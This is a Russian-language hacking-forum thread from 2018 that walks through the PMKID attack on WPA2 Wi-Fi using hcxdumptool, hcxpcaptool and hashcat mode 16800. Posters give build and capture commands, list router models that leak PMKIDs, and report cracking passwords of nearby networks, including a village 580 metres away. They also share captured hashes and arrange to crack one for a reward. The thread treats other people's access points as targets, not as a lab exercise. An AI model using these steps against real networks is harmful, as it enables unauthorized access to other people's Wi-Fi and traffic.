Просмотр полной версии : Брут WPA2 без handshake используя PMKID + hashcat
Vikhedgehog
06.08.2018, 03:07
RSN IE - это необязательное поле, которое можно найти в рамах управления 802.11. Одной из возможностей RSN является PMKID. PMKID вычисляется с использованием HMAC-SHA1, где ключ является PMK, а часть данных представляет собой конкатенацию фиксированной строковой метки «PMK Name», MAC-адрес точки доступа и MAC-адрес станции. Поскольку PMK такой же, как в обычном четырехстороннем рукопожатии EAPOL, это идеальный вектор атаки.
Мы получаем все необходимые данные в первом кадре EAPOL из AP.
Основное отличие от существующих атак заключается в том, что в этой атаке захват полного 4-стороннего рукопожатия EAPOL не требуется. Новая атака выполняется в IE RSN (надежный сетевой информационный элемент безопасности) одного кадра EAPOL.
В настоящее время мы не знаем, для каких поставщиков или для какого количества маршрутизаторов этот метод будет работать, но мы думаем, что он будет работать против всех сетей 802.11i / p / q / r с включенными функциями роуминга (большинство современных маршрутизаторов).
Основными преимуществами этой атаки являются следующие:
Больше не требуется регулярных пользователей - потому что злоумышленник напрямую связывается с AP (иначе говоря, «без клиента»)
Больше не нужно ждать полного 4-стороннего рукопожатия между обычным пользователем и AP
Отсутствие ретрансмиссии кадров EAPOL (что может привести к результатам, которые невозможно устранить)
Исключает неверные пароли, посланные обычным пользователем
Больше нет потерянных кадров EAPOL, когда обычный пользователь или AP находится слишком далеко от злоумышленника
Больше не требуется фиксировать значения nonce и replaycounter (что приводит к чуть более высоким скоростям)
Больше нет специального формата вывода (pcap, hccapx и т. Д.) - окончательные данные будут отображаться как обычная строка с шестнадцатеричным кодированием
Нам потребуются:
hcxdumptool v4.2.0 или выше
hcxtools v4.2.0 или выше
hashcat v4.2.0 или выше
Производим атаку:
1.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
Ждем, пока в выводе не увидим что-то подобное:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
2.
Переводим в нужный формат и скармливаем наш файл хэшкэту (да-да, по прежнему нужно брутить, так что пока не как с WEP)
$ ./hcxpcaptool -z test.16800 test.pcapng
Собственно на этом всё. Думаю это значительно облегчит брут точек с клиентскими устройствами, находящимися вне диапазона атакующего, а также откроет возможность быстрого сбора хэндшейков с пустых сетей в любых интересующих местах. Пишите, какие роутеры поддаются на практике, а то возможности протестировать пока нет. Осмелюсь также предположить, что в перспективе данная уязвимость будет лечиться обновлением прошивки на AP.
Оригинал статьи (советую почитать, я перевёл только основное) - https://hashcat.net/forum/thread-7717.html
Vikhedgehog
06.08.2018, 22:46
Только что проверил на TL-WN722N v1, чип atheros. Работает, но из ~30-40 сетей за 10 минут прога бахнула только штуки 4. Конкретный BSSID там, насколько понял, указать нельзя, поэтому прога скачет по каналам и атакует всё, что шлёт хоть какие-то фреймы. В данный момент вижу [tx=7458, powned=4, err=0]. Из жертв - точки asus rt-ac66u и микротики пока что.
Протестировал Alfa 036 ACH, Alfa 036H, TP-LINK 721N, чипсет INTEL 3165 AC. Из них нормально работают только Alfa 036H и Alfa 036 ACH. Туполинк менее мощный (видит меньше сетей) и перебирает медленно. Но PMKID нашел. Чип от Intel работает на рандом, PMKID может поймать при везении, но хеш потом практически не возможно получить.
Сегодня, нашлось время протестировать
На даче был, только Ubiquiti WiFiStation
https://c.radikal.ru/c38/1808/58/ca01264e30fd.jpg
Только что проверил на TL-WN722N v1
TP-LINK 721N
чип тот же, AR9271
---
По теме...PMKID + hashcat
Отличное решение для дачников (кто находится рядом с городскими поселениями), моряков и т.д., если клиентов не видно, но точка хорошо вещает
---
Расстояние, если верить яндекс картоизмерителю до близжайшего посёлка 580 метров
Устройство, отлично отработало),
нашло до х.. сетей c клиентами -1 PWR, в том числе совсем без клиентов,
из них 5 сетей с нормальной мощностью, которые были ....)
Так, что однозначно, Must Have!
Vikhedgehog
09.08.2018, 00:32
Протестил также на rtl8192cu (TP-LINK WN821N v4) - полёт нормальный.
Находит пмкид у всех новых асусов, вне зависимости от модели.
Чуть интереснее обстоят дела с зухелем, свежую ультру II берёт через несколько секунд после запуска скрипта, а на кинетике 4G II 2014 года - ноль.
С D-Link DSL-2640NRU и DAP-1360 тоже пока по нулям.
Продолжаю наблюдение
Уязвимы ростеловские:
Mitrastar
Sagemcom
Eltex
ZAO NPK RoTeK
OJSC Ufimskiy Zavod Promsvyaz
На скорость перебора я так понимаю никак не влияет?
На скорость перебора я так понимаю никак не влияет?
Скорость идентична перебору хендшейка wpa/wpa2.
Линуксоиды, распишите виндузятнику на пальцах, как запустить эту прогу. На WiFiSlax должна заработать?
Tudiblad
15.08.2018, 09:08
А атаку на конкретную точку доступа возможно провести или только пачкой (полным прослушиванием эфира)? А так получается, я даже не знаю, от какой точки доступа у меня PMKID, может уже та, что у меня есть.
Линуксоиды, распишите виндузятнику на пальцах, как запустить эту прогу. На WiFiSlax должна заработать?
Возможно корявенько получилось, но не пинайте сильно, я ненастоящий сварщик (с)
Делал в Кали. Все в терминале
1. git clone https://github.com/ZerBea/hcxdumptool
2. cd hcxdumptool
3. make
4. sudo make install
После этого получаем установленным первый компонент. После этого можно запускать атаку, единственно что у меня ключ --enable_status попросил значение, я тупо сложил все возможные числа из хелпа и указал 15
Он чего-то наловит в файл.
Чтобы сконвертировать, надо установить hcxpcaptool. Все аналогично устанавливается:
5. git clone https://github.com/ZerBea/hcxtools
6. cd hcxtools
7. make
8. У меня начало ругаться на недостающие библиотеки, пришлось их доустанавливать (5 минут в Гугле) apt install libssl-dev libcurl4-openssl-dev и еще apt install libz-dev
9. После этого make прошел без ошибок
10. sudo make install
А атаку на конкретную точку доступа возможно провести или только пачкой (полным прослушиванием эфира)? А так получается, я даже не знаю, от какой точки доступа у меня PMKID, может уже та, что у меня есть.
В ветке https://hashcat.net/forum/thread-7717.html упоминаются ключи --filtermode=2 --filterlist=filter.txt
Я создал файлик filter.txt, куда вписал мак интересующей точки (взял из airodump'а), только убрав двоеточия. Глянул потом в файл test.pcapng wireshark'ом, там все доступные сети в округе. Т.е. фильтр не работает. Или я что-то не так делаю...
Т.е. фильтр не работает
Похоже,что так оно и есть.Пробовал добавлять в фильтр целевую AP.И наооборот,все AP,кроме целевой.В обоих случаях,атака идёт на все видимые AP.
У меня хэшкота нет (нетбук), но я попробовал так (увидел на Гитхабе):
файл после первого этапа заливаю на wpa-sec.stanev.org предварительно сменив расширение на cap.
Когда я первый раз туда загрузил файл, в my nets отобразились несколько сетей. А после того, как я попробовал с фильтром и загрузил файл - только одна, мак которой я указал. Хотя в файле полно названия сетей... может быть он пакеты захватывает, пишет названия сетей, но дальнейшие данные по ним не пишет.
Но мне еще предстоит атака на заветную точку - там проводное подключение к роутеру, вайфай в пустоту светит - хэндшейк на ней вообще не ловится и подключенных клиентов я не вижу. Вот тогда и поглядим...
В противном случае можно хоть с неполного хендшейка выдрать pmkid, хоть самому подключиться к точке с неверным паролем и так же получить искомое
Если я правильно понял, то при наличии двух ноутов, те две программы из первого поста не нужны ? С одного ноута пытаемся подключиться с "левым" паролем, а другим ловим хендшейк ? Если так, то объясните пожалуйста, как выдрать из "акулы" PMKID и как подсунуть его "коту" (в смысле какой тип атаки выбирать) ??
Пользуюсь "котом" 3.2 или нужен более поздний ?
как выдрать из "акулы" PMKID
Используй hcxpcaptool
в смысле какой тип атаки выбирать
-m 16800
Пользуюсь "котом" 3.2 или нужен более поздний ?
Нужен не ниже 4.2.1
Tudiblad
16.08.2018, 13:47
Доброго дня всем. Кто знает, что означают цифры:
- you can run --enable-status=1 --enable-status=2 --enable-status=4 --enable-status=8
- or use the bitmask: --enable-status3 (= --enable-status=1 + --enable-status=2)?
Используй hcxpcaptool
-m 16800
Нужен не ниже 4.2.1
Спасибо, всё получилось, один пароль нашёл (Huawei HG8245H), остальные безклиентские точки ТПлинки,- обидно.
Мне всё же кажется, что через "левый" CAP с неправильным паролем делать удобнее.
Если кому надо - готовые XZM модули для WIFISLAX-4-12 hcxdumptool и hcxtools
https://yadi.sk/d/jRcYuntq3aJ3mz
Интересно, существует ли ГУИ для "кота" в котором есть этот пункт PMKID ?
Спасибо, всё получилось, один пароль нашёл (Huawei HG8245H), остальные безклиентские точки ТПлинки,- обидно.
Мне всё же кажется, что через "левый" CAP с неправильным паролем делать удобнее.
Если кому надо - готовые XZM модули для WIFISLAX-4-12 hcxdumptool и hcxtools
https://yadi.sk/d/jRcYuntq3aJ3mz
Интересно, существует ли ГУИ для "кота" в котором есть этот пункт PMKID ?
Ругается на твои модули при загрузке.Спрашивает-модуло коррупто? )) Это для 32битной 4.12 или для 64 битной?
Upd-разобрался,там перед xzm пробел лишний в названии
Tudiblad
16.08.2018, 21:41
Если кому надо - готовые XZM модули для WIFISLAX-4-12 hcxdumptool и hcxtools
Научи пожалуйста, как это вставить в WIFISLAX-4-12 и ещё вопрос: в wifislax64-1.1-final это можно вставить? Я всегда пользовался готовой сборкой.
Интересно, существует ли ГУИ для "кота" в котором есть этот пункт PMKID ?
Чисто для себя запилил в стандартный win GUI Hashcat 1.1 beta 0 от сюда: https://hashkiller.co.uk/hashcat-gui.aspx
поддержку формата 16800 PMKID.
Скачать можно тут:
http://zalil.su/6856679
Замените в ГУЕ в папке config файл hash-modes.xml на мой из ссылки выше, и будет вам счастье.
Ругается на твои модули при загрузке.Спрашивает-модуло коррупто? )) Это для 32битной 4.12 или для 64 битной?
Upd-разобрался,там перед xzm пробел лишний в названии
Естественно 32.
WIFISLAX-4-12 Не было 64бита, лично я на оф сайте не видел 4-12 64 бита.
Должно пойти и на 4.11 но не проверял.
Вставлять их надо к остальным модулям XZM в папку /wifislax/base на флешке . просто скопировать.
, и будет вам счастье.
СПАСИБО, всё ок.
Естественно 32.
WIFISLAX-4-12 Не было 64бита, лично я на оф сайте не видел 4-12 64 бита.
Должно пойти и на 4.11 но не проверял.
Вставлять их надо к остальным модулям XZM в папку /wifislax/base на флешке . просто скопировать.
Ну я обычно в папу modules кидаю,да и проблема была в пробеле перед точкой с расширением.Убрал,и все норм.
Ты можешь прям пошагово расписать последовательность всего этого в вайфайслаксе?А то щас штудирую тему с источника в шапке-там вообще все все по разному делают,нифига не понятно нелинуксоиду.Команды разные,всё по разному,кто в лес кто по дрова...
Обновился скрипт wifite.py https://github.com/derv82/wifite2/releases/tag/2.1.7
Добавлена опция для автоматического получения PMKID.
Можете сразу обновитть в своих любимых слаксах.
Проверил,работает.
Работает,но без клиента PMKID не захватывает. С клиентом всё срабатывает.
Ты можешь прям пошагово расписать последовательность всего этого...
На одном ноуте, под виндой, запускаю роутер-скан, на закладке вирилесс сканирую вайфай сети, вибираю нужную, через контекстное меню ПКМ выбираю пункт БРУТЕ-ФОРСЕ НЭТВОРК, указываю путь к маленькому словарику, на двести слов - СТАРТ. на этом ноуте пока всё.
На втором ноуте запускаю с флешки WIFISLAX-4-12 32 бита.
и ловлю хендшейк любой программой, предназначенной для этого, (я ловил прогой хендшейкер).
Пойманный хенжшейк конвертируем через терминал
( hcxpcaptool -z ТВОЙ.16800 ТВОЙ.cap ) без кавычек
без указывания адресов, - ВСЕ ФАЙЛЫ ДОЛЖНЫ НАХОДИТЬСЯ В ПАПКЕ root
там же найдём и результат - файл ТВОЙ.16800 , его мы и скормим "коту"
( hcxpcaptool -z ТВОЙ.16800 ТВОЙ.cap ) без кавычек
hcxpcaptool или hcxdumptool ?
hcxpcaptool или hcxdumptool ?
hcxpcaptool
У меня в хендшейках почему то в ключах время стоит по нулям,из за чего при конвертировании пишет
Zero value timestamps detected in file: C:\1\111\111.cap.
This prevents correct EAPOL-Key timeout calculation.
Do not use preprocess the capture file with tools such as wpaclean.
Уже несколько раз ловил,одна и та же ситуация .А в шарке-вот как выглядит
http://prntscr.com/kjnrmz
Вот сам хендшейк http://rgho.st/8tJcMtGDq
У меня в хендшейках почему то в ключах время стоит по нулям
Эти с нулевыми таймингами (скорее всего wpaclean постарался) конвертирует утилита из версии
hashcat-utils 1.7.
Это cap2hccapx и ругается,из сборки hashcat-utils 1.9
Эти с нулевыми таймингами (скорее всего wpaclean постарался) конвертирует утилита из версии
hashcat-utils 1.7.
Как ни странно- 1.7 конвертнула без проблем!Огромное спасибо за наводку,отписываюсь сюда-вдруг кто тоже столкнется с подобной проблемой.
Это cap2hccapx и ругается,из сборки hashcat-utils 1.9
Это как раз некая защита от плохих хендшейков была сделана,так как при конвертации не видно тех самых таймингов
Вау!
Любопытное решение.
Ну тут уж точно скоро по мотивам скриптом инструмент нарисуют для wifislax
А по теме вопрос - в конце результат скармиливать строго и только коту? Или тот же wireless_password_recovery сможет тоже?
по теме вопрос - в конце результат скармиливать строго и только коту? Или тот же wireless_password_recovery сможет тоже?
Пока может только кот версии 4.2.0 и выше.
Hombredel
19.08.2018, 01:15
актуально будет выкладывать формат .16800 в теме бесплатного перебора?
видел пару попыток, выкладывали, но никто не сбрутил. хотя.. может просто гиморнее колдовство с этим форматом)
Andrey9999
19.08.2018, 01:27
гиморнее - не все hashcat'ом вообще пользуются, а тем более если без ESSID BSSID
Его можно собрать вручную, выискивая нужные данные из пакетов, PMKID, BSSID и адрес клиента можно выдрать из М1 пакета, просто найдя эти поля и скопировав данные хоть в блокнот.
А у меня почему то вручную другой результат получается , нежели с конвертацией с помощью утилиты hcxpcaptool .
Проверьте пожалуйста, если не в лом.
http://rgho.st/7yLGVXvhf
В архиве два файла - левый .CAP с неправильным паролем
и файл .16800 , сконвертированный утилитой hcxpcaptool .
P.S. А может такое быть, что пароля нет совсем, клиентов не было с момента появления ?
А у меня почему то вручную другой результат получается , нежели с конвертацией с помощью утилиты hcxpcaptool .
Проверьте пожалуйста, если не в лом.
http://rgho.st/7yLGVXvhf
В архиве два файла - левый .CAP с неправильным паролем
и файл .16800 , сконвертированный утилитой hcxpcaptool .
P.S. А может такое быть, что пароля нет совсем, клиентов не было с момента появления ?
RSN PMKID: 04a5812a5094662784ca91f02bb7dc9d
и a5812a5094662784ca91f02bb7dc9d1a*e84dd0efa550*d46e 0e10a30f*4855415745492d32323234
Вопрос к гуру.Что это?
Может Wireshark надо обновить? У меня вручную получается хеш, идентичный тому что в 16800 файле, который утилита генерирует.
Вот видео https://dropmefiles.com/6dndd
Таки да.
Более свежая акула показала
a5812a5094662784ca91f02bb7dc9d1a
И правда, начиная с версии 2.2.0 - отображается нормально.
Новые версии начиная с 2.4.0 - не работают в WIN7 32bit. (во всяком случае у меня).
Страница со всеми версиями "акулы" (почти).
https://www.wireshark.org/download/win32/all-versions/
Если надо 64bit , - Parent Directory
c0d5adfcd1b7f6fa1b68eb50f0e8463d*ec4c4d7df8c0*d065 ca76bc14*52542d576946695f46384330
Ребят тут 2 хеша как правельно удалить лишний
c0d5adfcd1b7f6fa1b68eb50f0e8463d*ec4c4d7df8c0*d065 ca76bc14*52542d576946695f46384330
Ребят тут 2 хеша как правельно удалить лишний
ну один вообще-то
Чувствую,что дурдом с этим 16800 ещё впереди
Ребят тут 2 хеша как правельно удалить лишний
Нет там ничего лишнего, в конце закодировано имя сети RT-WiFi_F8C0 таким способом. Хеш выглядит именно так как и должен.
Нет там ничего лишнего, в конце закодировано имя сети RT-WiFi_F8C0 таким способом. Хеш выглядит именно так как и должен.
А кроме hashcat есть программы чтоб расшифровать этот хеш?
У меня он не работает на MD Radeon HD 7670M
Tudiblad
20.08.2018, 09:26
У меня он не работает на MD Radeon HD 7670M
Читай внимательно, тебе программа сама пишет, что делать.
Читай внимательно, тебе программа сама пишет, что делать.
Всегда с этого лолировал. Уже софтины даже ссылки на решения проблем дают и пишут сами что делать, но все как всегда.
Явлению даже название придумали - жертва ЕГЭ.
Читай внимательно, тебе программа сама пишет, что делать.
Подружил... hascat обещает что подбор хеша по маске закончится через 3 дня
Tudiblad
21.08.2018, 10:53
Да, спасибо большое, я это в форуме на коте нашёл. Попробовал, пока не получилось, может конечно станция TP-LINK не отдала PMKID, а может далековато до станции............
Tudiblad
21.08.2018, 11:10
И не отдаст, tplinkи похоже все его не отдают.
Тогда я понимаю можно вытащить только из М1 акулой..........
Тогда я понимаю можно вытащить только из М1 акулой..........
Нет, этих данных (PMKID) в M1 не содержится.Только ХШ ловить.
Tudiblad
21.08.2018, 14:39
Нет, этих данных (PMKID) в M1 не содержится.Только ХШ ловить.
https://forum.antichat.ru/threads/464369/page-2#post-4238069
https://forum.antichat.ru/threads/464369/page-2#post-4238069
Это я видел.И что там?
https://forum.antichat.ru/threads/464369/page-2#post-4238069
В весьма ограниченном количестве cap виден PMKID
Логично,что,если
Да, спасибо большое, я это в форуме на коте нашёл. Попробовал, пока не получилось, может конечно станция TP-LINK не отдала PMKID, а может далековато до станции............
И не отдаст, tplinkи похоже все его не отдают.
то и не будет его в cap
и как ответил
hydra
Только ХШ ловить.
Вообще не понимаю помешательства с этим PMKID.Ну новый метод.Но главное по сути преимущество,это,если нет клиента и трудности с перехватом хендшейков.Для подбора пароля разницы никакой.Ловите дедовским старым способом,если есть такая возможность
Tudiblad
21.08.2018, 15:12
преимущество,это,если нет клиента
Вот в этом весь вопрос.
Tudiblad
21.08.2018, 15:50
Ну про wifite.py ребята писали, что без клиента не ловит PMKID, а вот hcxdumptool не скажу про клиентов, а вообще ловит, ну правда может клиенты были.
Скорее всего,захват возможен только при задействовании двух адаптеров.Один подключается.Второй дампит.Один адаптер находящийся в monitor mode,не может пдключаться к точке штатным методом.
binarymaster
22.08.2018, 20:24
Скорее всего,захват возможен только при задействовании двух адаптеров.Один подключается.Второй дампит.Один адаптер находящийся в monitor mode,не может пдключаться к точке штатным методом.
Хм... а в чём проблема в режиме монитора, посылая пакеты, имитировать подключение, чтобы пакет M1 пришёл?
Хм... а в чём проблема в режиме монитора, посылая пакеты, имитировать подключение, чтобы пакет M1 пришёл?
Думал об этом,но немогу сказать,что это реализовано в софте о котором идёт речь.Ведь если бы это было так,то наверняка бы всё срабатывало.
Нужно чтобы кто-нибудь отписался об успешном захвате PMKID без клиента.
в режиме монитора, посылая пакеты, имитировать подключение
Вопрос в другом - а чем это можно осуществить. aireplay-ng умеет имитировать подключение, но только к wep сетям.
А роутерскан можно обучить таким возможностям?
binarymaster
22.08.2018, 23:14
Вопрос в другом - а чем это можно осуществить. aireplay-ng умеет имитировать подключение, но только к wep сетям.
aireplay-ng с открытым кодом, и его можно научить этому.
А роутерскан можно обучить таким возможностям?
Под Windows не всё так гладко с режимом монитора, а с инъекцией пакетов вообще не ахти.
Пробовал этот метод на альфе awus051nh v2 чип RT3572.
И вот что заметил - сообщения [FOUND PMKID] (как в цитате ниже) - не появляется.
Ждем, пока в выводе не увидим что-то подобное:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
Значит ли это, что этот адаптер не умеет эту атаку?
binarymaster
24.08.2018, 16:45
Значит ли это, что этот адаптер не умеет эту атаку?
Не обязательно, может уязвимых точек в округе нет.
Для дополнительной уверенности можно попробовать проверить на другом адаптере.
По поводу адаптеров, как выше кто-то писал - почти любой с возможностью инъекции пакетов. Я тестировал на 036H, ACH, TP LINK 721N (Atheros 9271 без L) + еще Intel, штеуд хуже всех, но все равно ловит, хоть и с ошибками. Думаю дело в его малой мощности, чувствительности и т.д.
Вот этого-то я ниразу пока не видел.Хотя точки 100% уязвимы. TP LINK 722N (Atheros 9271)
Возможно дело в том, что сами инструменты активно обновляются. Надо раз в неделю гит проверять. Тоже сначала не понимал в чем дело. Стоит обратить внимание на опции --enable_status=1 это уровень детализации атаки.
Пробовал этот метод на альфе awus051nh v2 чип RT3572.
И вот что заметил - сообщения [FOUND PMKID] (как в цитате ниже) - не появляется.
Значит ли это, что этот адаптер не умеет эту атаку?
Не обязательно, может уязвимых точек в округе нет.
Для дополнительной уверенности можно попробовать проверить на другом адаптере.
Проверил на этом же адаптере, но в другой географии. Чего-то поймал, в смысле сообщение [FOUND PMKID] я увидел.
Так что этот чип тоже можно добавить в перечень годных.
Monashka
30.08.2018, 02:57
Формула для акулы есть?
Запрос можно и вручную отправить. Автор на источнике указал примеры, там на 14 хэндшейков приходится 1 PMKID..
VasiliyP
03.09.2018, 16:22
Чем захвачен ? Можно подробней описать процесс?
В консоли: tcpdump -nei wlan0 -s0 -xx
если нужно сохранить файл то опция -w file.cap
отфильтровать только EAPOL пакеты - в конце добавить ether proto 0x888e
Суть в том, что свои EAPOL пакеты видны на wi-fi интерфейсе и без режима монитора.
binarymaster
03.09.2018, 20:08
В консоли: tcpdump -nei wlan0 -s0 -xx
если нужно сохранить файл то опция -w file.cap
отфильтровать только EAPOL пакеты - в конце добавить ether proto 0x888e
Суть в том, что свои EAPOL пакеты видны на wi-fi интерфейсе и без режима монитора.
Я правильно понимаю, что для tcpdump нужны root права? Или есть окольные пути?
CRACK211
03.09.2018, 22:51
То есть получается нужда в ловли хейндшека отпадает ? И возня с переводом адаптера в монитор мод тоже? Из этого следует что на Виндоус можно ловить pmkid и расшифровать. А из это следует что бинартмастер может прикрутить эту фичу вRS?
В консоли: tcpdump -nei wlan0 -s0 -xx
если нужно сохранить файл то опция -w file.cap
отфильтровать только EAPOL пакеты - в конце добавить ether proto 0x888e
Суть в том, что свои EAPOL пакеты видны на wi-fi интерфейсе и без режима монитора.
Я правильно понимаю, что для tcpdump нужны root права? Или есть окольные пути?
Права на запуск программы tcpdump определяются правами доступа к устройсву bpf (/dev/bpf0). Эти права можно регулировать через devfs. Если вы предоставляете, например, группе operator права на чтение из этого устройства, то это значит, что все члены этой группы смогут перехватывать любой трафик, в том числе трафик суперпользователя.
Если речь идет за андройд, то да, tcpdump там запускается от суперпользователя:
https://www.androidtcpdump.com/
Утилиту tcpdump можно использовать не только в Linux, но Windows.
TCPDUMP для Windows является клоном TCPDUMP, наиболее используемого сетевого анализатора / анализатора для UNIX, скомпилированного с исходным кодом tcpdump (tcpdump.org) и пакетом SDK от Microolap Packet Sniffer (без libpcap / WinPcap).
Клон TCPDUMP для Windows можно скачать на microolap.com
--------
https://wiki.dieg.info/tcpdump
binarymaster
04.09.2018, 00:13
Из этого следует что на Виндоус можно ловить pmkid и расшифровать. А из это следует что бинартмастер может прикрутить эту фичу вRS?
Если что-то работает в Android (читай Linux), из этого не следует, что заработает в Windows.
Я много раз мониторил Wireshark'ом процесс подключения к точке (в managed режиме) под Windows. Никаких EAPOL пакетов не приходило.
Однако есть у меня одна мысля на этот счёт, возможно точки с включённым WPS поддадутся на один трюк...
VasiliyP
04.09.2018, 00:36
Я правильно понимаю, что для tcpdump нужны root права?
Ага.
То есть получается нужда в ловли хейндшека отпадает ? И возня с переводом адаптера в монитор мод тоже?
Это было бы верно, если бы все точки отдавали этот PMKID...
CRACK211
04.09.2018, 07:32
Если что-то работает в Android (читай Linux), из этого не следует, что заработает в Windows.
Я много раз мониторил Wireshark'ом процесс подключения к точке (в managed режиме) под Windows. Никаких EAPOL пакетов не приходило.
Однако есть у меня одна мысля на этот счёт, возможно точки с включённым WPS поддадутся на один трюк...
Я знаю что андроид построен Линукс. Но для видоус есть аналогичные программы)
Ага.
Это было бы верно, если бы все точки отдавали этот PMKID...
Если даже не все точки будут отдавать нужные данные это лучше чем ни чего) разве нет ?
CRACK211
04.09.2018, 07:42
https://github.com/hsluoyz/WlanHelper
Может кто из знатоков сможет раскурить тему. Это программа как я понял включает режим монитора в видоус. Вот правда не знаю можно ли инжектрть пакеты.
https://nmap.org/npcap/guide/npcap-devguide.html
binarymaster
04.09.2018, 15:31
https://github.com/hsluoyz/WlanHelper
Может кто из знатоков сможет раскурить тему. Это программа как я понял включает режим монитора в видоус. Вот правда не знаю можно ли инжектрть пакеты.
https://nmap.org/npcap/guide/npcap-devguide.html
Эта утилита поставляется вместе с Npcap, и я осведомлён о её существовании и о том, как она работает. Npcap не позволяет проводить инъекцию пакетов, пока что.
И ещё, считаю это оффтопом, и бессмысленным дублированием существующей информации (используйте поиск по форуму по тегу Npcap).
CRACK211
04.09.2018, 16:34
Эта утилита поставляется вместе с Npcap, и я осведомлён о её существовании и о том, как она работает. Npcap не позволяет проводить инъекцию пакетов, пока что.
И ещё, считаю это оффтопом, и бессмысленным дублированием существующей информации (используйте поиск по форуму по тегу Npcap).
Я ссылкой ошибся (
https://github.com/nmap/nmap/issues/1144 я хотел этим поделится ) но вы и за это вкурсе )
Monashka
05.09.2018, 21:14
Не понял зачем инжект.
binarymaster
05.09.2018, 21:37
Не понял зачем инжект.
А как ещё по-твоему Authorization Request отправить? Без него точка EAPOL Key 1 не пришлёт.
Monashka
06.09.2018, 09:34
А если я просто пытаюсь соединиться с левым паролем, это не Authorization Request?
binarymaster
06.09.2018, 14:49
А если я просто пытаюсь соединиться с левым паролем, это не Authorization Request?
Уровень по модели OSI не тот, учите матчасть. Под Windows этот тип пакетов без режима монитора не поймать.
Отправить можно средствами системы, но опять же, только в managed режиме.
Monashka
06.09.2018, 22:21
А есть уже пентест сборки Linux, в которых присутствуют инструменты для ловли PMKID?
Может кто-то посоветует. AirCrack, AirSlax, Kali и ещё вроде 2 есть, одна на P начинается..
CRACK211
15.09.2018, 14:00
Если что-то работает в Android (читай Linux), из этого не следует, что заработает в Windows.
Я много раз мониторил Wireshark'ом процесс подключения к точке (в managed режиме) под Windows. Никаких EAPOL пакетов не приходило.
Однако есть у меня одна мысля на этот счёт, возможно точки с включённым WPS поддадутся на один трюк...
Можно поинтересоваться как прошел трюк с точками с включенным wps ?
binarymaster
15.09.2018, 21:08
Можно поинтересоваться как прошел трюк с точками с включенным wps ?
Не прошёл. Для того, чтобы получить EAPOL Key 1, нужен Authentication Request.
Для отправки WPS пакетов выполняется подключение к точке в режиме Open (без шифрования). После этого можно отправлять нешифрованные EAPOL пакеты, однако при таком раскладе запрос авторизации не отправляется, поэтому EAPOL Key 1 не приходит. А на посылаемый EAPOL Key 2 точка уже не реагирует.
В теории, можно ещё попробовать "сломать" сервис wlansvc, отвечающий за подключение к точкам и работу с профилями беспроводных сетей. Чтобы он выполнил подключение к точке с нужными пакетами, но при этом без шифрования пакетов (как если бы подключался к открытой точке).
Monashka
16.09.2018, 23:21
отфильтровать только EAPOL пакеты - в конце добавить ether proto 0x888e
Там же ждать нужно какое-то время пока будет получен пакет с pmkid, и потом рыться в этих eapol искать его? Или чкак?
VasiliyP
17.09.2018, 01:13
Там же ждать нужно какое-то время пока будет получен пакет с pmkid
Нужно сделать попытку подключения с этого же интерфейса, тогда и только тогда будет нужный пакет.
и потом рыться в этих eapol искать его?
Не нужно рыться - с указанным фильтром - это будет самый первый пакет. Вдобавок можно включить опцию в tcpdump - захватить только один пакет.
Monashka
17.09.2018, 01:57
тогда будет нужный пакет
Этот .cap, что дальше с ним нужно будет сделать? Ведь нужно вытащить сам хэш, ну ту запись..
Вы могли бы описать свой метод на форуме hashcat, в той теме что про pmkid.
VasiliyP
17.09.2018, 11:06
Этот .cap, что дальше с ним нужно будет сделать? Ведь нужно вытащить сам хэш, ну ту запись..
Здесь уже описано: https://forum.antichat.ru/threads/464369/page-2#post-4238069
В новой версии Passcape Wireless Password Recovery появилась поддержка PMKID.
binarymaster
28.09.2018, 02:04
В новой версии Passcape Wireless Password Recovery появилась поддержка PMKID.
В набор aircrack-ng тоже добавили, чуть меньше недели назад:
https://github.com/aircrack-ng/aircrack-ng/commit/d4a7da07b369d49988a864af4b670862d92ff0b6
Правда придётся дождаться версии 1.4
Monashka
28.09.2018, 07:36
Есть хоть кто-то кто на андройде поймал pmkid? Покажите что наловили.
binarymaster
30.09.2018, 00:18
Правда придётся дождаться версии 1.4
Свершилось!
https://github.com/aircrack-ng/aircrack-ng/releases/tag/1.4
Triton_Mgn
30.09.2018, 00:51
Кстати, интересно для новичков и не только, протестить и написать инструкцию в тему https://test.antichat.xyz/forums/30/
Можно получить грин репу. А самое главное набраться опыта. Пока эта тема не обуздана, дерзайте.
fire-dance
30.09.2018, 09:39
В новой версии Passcape Wireless Password Recovery появилась поддержка PMKID.
гдебы взять крякнутую)
Triton_Mgn
30.09.2018, 09:47
гдебы взять крякнутую)
Акстись, зачем платить если все решено https://github.com/aircrack-ng/aircrack-ng/releases/tag/1.4
Кстати, интересно для новичков и не только, протестить и написать инструкцию в тему https://test.antichat.xyz/forums/30/
Можно получить грин репу.
На меня не надейтесь.
Triton_Mgn
30.09.2018, 11:01
На меня не надейтесь.
Ну если совсем прижмет, ты же не откажешь?,
Ну если совсем прижмет, ты же не откажешь?,
Это кто же меня прижмет в болталке? Да и репа мне абсолютно не нужна. Ладно не будем флудом юзеру100 топик заполнять.
Собрал PMKID вручную по инструкции от TOX1C, теперь хотелось бы сбрутить. Может кто возьмется за вознаграждение?
Monashka
30.09.2018, 12:17
Может кто возьмется за вознаграждение?
Я возьмусь просто так.
Проверено:
Ростелекомовские Sagemcom F@ST 1744 v2.2 без проблем отдают PMKID даже без клиентов.
Логи я не делал. Собирал вручную как советовал TOX1C.
У меня две WI-FI карты на компе, на одной ловил Handshake через airodump-ng: "airodump-ng wlan1 --channel 11 --bssid 44:E9D:**:**:** -w cap2", а на другой подключался с неверным паролем. Затем из .cap файла вытаскивал нужную инфу через Wireshark. Все делал в Kali linux.
binarymaster
30.09.2018, 17:04
отдают PMKID даже без клиентов
Вы это так сказали, будто PMKID есть смысл с клиентами получать.
Pirnazar
04.10.2018, 16:08
